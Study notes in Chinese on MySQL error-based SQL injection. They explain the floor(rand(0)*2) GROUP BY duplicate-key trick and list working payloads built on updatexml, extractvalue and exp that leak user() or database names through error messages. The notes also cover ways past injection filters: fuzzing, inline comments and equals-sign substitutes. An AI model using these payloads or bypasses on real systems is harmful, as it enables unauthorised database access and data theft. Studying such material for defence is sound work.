相关的sql函数说明:
rand() 用于产生一个0到1之间的随机数
floor() 向下取整
floor(rand()) 得到的值永远为0
floor(rand()*2) 得到的值可能为1可能为0
select floor(rand()*2) from 有很多数据的表名
有多少条数据就生成多少个0或者1,并且重复执行这句话,结果无法复现
但是如果给rand()传入一个随机数种子,比如0,反复执行结果是可以复现,生成的是比较固定的伪随机数:011011001110
select count(*) from user group by floor(rand()*2)
虽然floor(rand()*2) 要么为1要么为0 ,但是这句话并等于select count(*) from user group by 0 或者group by 1。
因为查询结果每条数据生成时候都会执行一次floor(rand()*2) 所以这条语句有时会报错,有时不会报错
猜测:
比如说floor(rand()*2) 生成的序列为:
0
1
0
1
0
1
分类的过程分为两步,第一步查询原表,第二步将分类标准和计数值插入虚表
因为查询原表时floor(rand()*2) 会执行一次,插入虚表时floor(rand()*2) 又会执行一次
那么两次结果就可能不同
比如,第一次查原表时floor(rand()*2) 为0,0在虚表中没有,所以将floor(rand()*2)插入到虚表中,结果生成了一个1。第三次查询原表时又查到了一个0,0在虚表中又没有,所以又将floor(rand()*2)插入到虚表中,结果又生成一个1,虚表中两个1发生了冲突,所以报错
报错:
验证猜想:
如果我传入一个随机数种子0,那么该语句是必然报错的(数据量的最小要求为3)
select count(*) from user group by floor(rand(0)*2)
同样这句sql也会报错:
select count(*),concat(user(),floor(rand(0)*2)) as x from information_schema.tables group by x
也是由于group by 重复计算x而导致的报错,通过这个报错就可以把user() 查出来
其他的报错函数:
(1)updatexml函数:
公式:or updatexml(1,concat(0x7e,(查询语句)),0)
报错原因:updatexml函数的第二个函数要求是Xpath格式的字符串,输入不符合所以报错。注:updatexml的最大长度为32位
(2) and extractvalue(1,concat(0x7e,(select database())))
(3) and exp(~(select * from (select user())a));
绕过sql注入检测机制:
1.通过模糊测试去探测对方的sql注入检测机制,观察检测机制检查了什么。(可以自己写工具跑字典,也可以用brupsuite的intruder去跑)
2.通过各种替代方案去尝试绕过对方的sql注入检测机制
SQL语句的注入方式
/**/ 用内联注释可以将函数名和括号分割开 updatexml /*adsadasd*/ (1,concat(),0),比如说where username=''updatexml /* and password= '*/(1,concat(),0) or '1'
+--+
#
等于号的替代方案:
where id=1
where id like 1
where id regexp 1
where !(id<>1) 双重否定表肯定